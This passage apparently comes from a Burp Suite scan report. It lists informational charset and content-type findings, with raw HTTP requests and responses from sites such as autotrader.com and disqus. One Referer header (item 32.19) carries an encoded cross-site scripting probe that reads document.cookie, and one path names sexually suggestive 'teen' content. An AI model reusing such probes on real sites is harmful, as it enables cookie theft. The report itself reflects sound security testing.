Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:24 GMT
Server: Apache
Set-Cookie: v1st=F1B5B0190A0903E5; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885064281746; path=/; expires=Sat, 03-Jan-15 16:04:24 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1871241226.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.11. http://www.autotrader.com/x22/x3e/x3cli

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.autotrader.com
Path:   /x22/x3e/x3cli

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:

Request

GET /x22/x3e/x3cli HTTP/1.1
Host: www.autotrader.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 16:04:21 GMT
Server: Apache
Set-Cookie: v1st=44290BD80D43DD62; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1295885061096866; path=/; expires=Sat, 03-Jan-15 16:04:21 GMT; domain=.autotrader.com
Last-Modified: Tue, 02 Nov 2010 16:44:27 GMT
Accept-Ranges: bytes
Content-Length: 5848
Vary: Accept-Encoding
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Connection: close
Content-Type: text/html
Set-Cookie: BIGipServerwww=1351147530.61475.0000; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Page Not Found - AutoTrader.com</title>
<meta http-equiv="Content-Type" content="text/html; charset= iso-8859-1" />
<link rel="stylesheet" href="/inc/css/error_pages.css" type="text/css" />
...[SNIP]...

31.12. http://www.heroturko.org/n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.heroturko.org
Path:   /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:
  • windows-1254

Request

GET /n/Nonude-Young-and-Beauty-Pretty-Girl-teen-NN-usenet-binaries/x22 HTTP/1.1
Host: www.heroturko.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 24 Jan 2011 16:45:19 GMT
Content-Type: text/html
Connection: close
Vary: Accept-Encoding
X-Powered-By: PHP/5.3.3
Set-Cookie: PHPSESSID=2636237a3d9a6cc753ecc8b5ac337b9c; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: dle_user_id=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_password=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Set-Cookie: dle_hash=deleted; expires=Sun, 24-Jan-2010 16:45:18 GMT; path=/; domain=.heroturko.org; httponly
Last-Modified: Mon, 24 Jan 2011 06:45:19 +0000 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 45000

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><head>
<title>Nonude Young and Beauty Pretty Girl teen NN usenet binariesx22 H
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-1254" />
<meta name="description" content="Download All You Want!" />
...[SNIP]...

31.13. http://www.joomla-ua.org/content/view/400/10/

Summary

Severity:   Information
Confidence:   Tentative
Host:   http://www.joomla-ua.org
Path:   /content/view/400/10/

Issue detail

The response specifies that its MIME type is HTML. However, it specifies a charset that is not commonly recognised as standard. The following charset directive was specified:
  • windows-1251

Request

GET /content/view/400/10/ HTTP/1.1
Host: www.joomla-ua.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 24 Jan 2011 16:04:09 GMT
Content-Type: text/html; charset=windows-1251
Connection: close
X-Powered-By: PHP/5.2.10
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 40cf95daa28915bd744253aab220bb63=-; path=/
Last-Modified: Mon, 24 Jan 2011 16:04:09 GMT
Content-Length: 36298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="uk" xml:lang="uk">
<head>

...[SNIP]...
<meta http-equiv="Content-Language" content="uk" />
<meta http-equiv="Content-Type" content="text/html; charset=windows-1251" />
<link rel="alternate" type="application/rss+xml" title="Joomla! ......." href="http://www.joomla-ua.org/component/option,com_rss/feed,RSS2.0/no_html,1/" />
...[SNIP]...

32. Content type incorrectly stated
There are 115 instances of this issue:

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly, analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results and, if the content contains any user-controllable data, may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.


32.1. http://7newsboston.disqus.com/block.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /block.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /block.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.2. http://7newsboston.disqus.com/embed/editcomment.html

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /embed/editcomment.html

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /embed/editcomment.html HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:07 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.3. http://7newsboston.disqus.com/hidereaction.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /hidereaction.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /hidereaction.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:28 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.4. http://7newsboston.disqus.com/highlight.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /highlight.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /highlight.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:39 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.5. http://7newsboston.disqus.com/kill.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /kill.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /kill.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:44 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.6. http://7newsboston.disqus.com/more_reactions.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /more_reactions.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /more_reactions.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:31 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.7. http://7newsboston.disqus.com/reportspam.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /reportspam.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /reportspam.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:58 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.8. http://7newsboston.disqus.com/show_user_votes.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /show_user_votes.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /show_user_votes.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:57 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.9. http://7newsboston.disqus.com/subscribe.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /subscribe.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /subscribe.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:38 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/javascript; charset=UTF-8

Missing parameters.

32.10. http://7newsboston.disqus.com/thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /thread/whdh_tv_commuter_rail_service_updates_for_jan_24_22/post_report/ HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:27:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html; charset=utf-8

Missing parameters.

32.11. http://7newsboston.disqus.com/thread_share.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /thread_share.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /thread_share.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:18 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.12. http://7newsboston.disqus.com/thread_vote.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /thread_vote.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /thread_vote.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:18 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.13. http://7newsboston.disqus.com/toggle_thread_closed.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /toggle_thread_closed.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /toggle_thread_closed.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:50 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.14. http://7newsboston.disqus.com/toggle_thread_killed.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /toggle_thread_killed.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /toggle_thread_killed.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:45 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.15. http://7newsboston.disqus.com/update_days_alive.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /update_days_alive.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update_days_alive.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:55 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19

Missing parameters.

32.16. http://7newsboston.disqus.com/update_moderate_all.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /update_moderate_all.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/html; charset=utf-8
The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /update_moderate_all.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:52 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Cookie,Accept-Encoding
Content-Length: 19
Connection: close
Content-Type: text/html; charset=utf-8

Missing parameters.

32.17. http://7newsboston.disqus.com/vote.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://7newsboston.disqus.com
Path:   /vote.js

Issue detail

The response contains the following Content-type statement:
  • Content-Type: text/javascript; charset=UTF-8
The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /vote.js HTTP/1.1
Host: 7newsboston.disqus.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: test=1; __utmz=130959497.1295906167.1.1.utmcsr=www1.whdh.com|utmccn=(referral)|utmcmd=referral|utmcct=/news/articles/local/12003359267921/commuter-rail-service-updates-for-jan-24/; __utma=130959497.687938179.1295906167.1295906167.1295906167.1; __utmc=130959497; __utmb=130959497.3.10.1295906167; __qca=P0-473502224-1295482487215;

Response

HTTP/1.1 400 BAD REQUEST
Date: Mon, 24 Jan 2011 22:28:17 GMT
Server: Apache/2.2.14 (Ubuntu)
Vary: Accept-Encoding
Connection: close
Content-Type: text/javascript; charset=UTF-8
Content-Length: 19

Missing parameters.

32.18. http://a1.twimg.com/profile_images/343677863/twitterProfilePhoto_mini.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://a1.twimg.com
Path:   /profile_images/343677863/twitterProfilePhoto_mini.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /profile_images/343677863/twitterProfilePhoto_mini.jpg HTTP/1.1
Host: a1.twimg.com
Proxy-Connection: keep-alive
Referer: http://tweetmeme.com/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 22:20:54 GMT
Expires: Thu, 24 Jan 2019 17:40:02 GMT
Last-Modified: Sun, 02 Aug 2009 03:19:54 GMT
Cache-Control: max-age=252460800
Content-Type: image/jpeg
ETag: "16e2a19feb8b141487141adf5ccc5221"
Accept-Ranges: bytes
Server: AmazonS3
X-Amz-Cf-Id: 75c07f9d1173dce7be51acc5a7dc558818bec8f2170d9340bd112306384c6260edd82db73305add5,021131e991bd41d871c2cf015be6ca42a025b063342d213952143b873d2760be60b3292a242df725
x-amz-id-2: 7665+GotKZiJYkKld8FM4IbmHiPUxXklauvVhWUDZH1vojpgWbkYtsfXTI3l0H3p
x-amz-request-id: 481E901B85FE84C3
X-Cache: Miss from cloudfront
Content-Length: 1682

.PNG
.
...IHDR..............w=.....gAMA......a.....sRGB........ cHRM..z&..............u0...`..:....p..Q<....bKGD.............    pHYs...H...H.F.k>...    vpAg.........xL......IDATH.E...\G......{{x..<....D
...[SNIP]...

32.19. http://ad.masjo.com/www/images/9e5dbe547324652614df8323d01ce01e.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ad.masjo.com
Path:   /www/images/9e5dbe547324652614df8323d01ce01e.jpg

Issue detail

The response contains the following Content-type statement:
  • Content-Type: image/jpeg
The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /www/images/9e5dbe547324652614df8323d01ce01e.jpg HTTP/1.1
Host: ad.masjo.com
Proxy-Connection: keep-alive
Referer: http://www.masjo.com/search/learn+typing+quick+and+easy+cracka074f%3Cscript%3Ealert(document.cookie)%3C/script%3Ec4a5acfda9b/page/419/x22
Cache-Control: max-age=0
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=143117481.1295903077.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/30; __utma=143117481.1825936610.1295903073.1295903073.1295903073.1; __utmc=143117481; __utmb=143117481.1.10.1295903073; OAID=84cb75988ed38bcbe06c44d77408a71e

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:04:22 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/4.4.9 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sun, 16 Jan 2011 12:37:36 GMT
ETag: "238d79-fb45-499f5ee9ac400"
Accept-Ranges: bytes
Content-Length: 64325
Content-Type: image/jpeg

GIF89a............M9i........../U'Q.A........H..@rqq............M.<l.9.....>OOPBy4...........F..e........8..................i.\....h^.........Gf...........-...v{..?s1v.j..5.........H.....n............
...[SNIP]...

32.20. http://ads.pointroll.com/PortalServe/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The response contains the following Content-type statement:
  • Content-type: text/html
The response states that it contains HTML. However, it actually appears to contain CSS.

Request

